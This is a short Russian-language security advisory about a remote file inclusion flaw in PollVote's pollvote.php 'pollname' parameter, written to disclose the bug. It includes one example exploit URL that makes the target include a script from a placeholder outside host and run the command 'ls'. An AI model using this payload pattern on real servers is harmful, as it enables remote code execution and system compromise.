PHP инклюдинг в PollVote

Дата публикации:
17.11.2005
Всего просмотров:
2837
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Pollvote
Уязвимые версии: PollVote

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной фильтрации входных данных в параметре "pollname" сценария "pollvote.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера. Пример:

http://www.[host].com/[path]/pollvote.php?
pollname=http://www.[host].com/CMD.gif?&cmd=ls

URL производителя: www.w58.de/~ibozic/pollvote/

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: PollVote Remote File Inclusion

или введите имя

CAPTCHA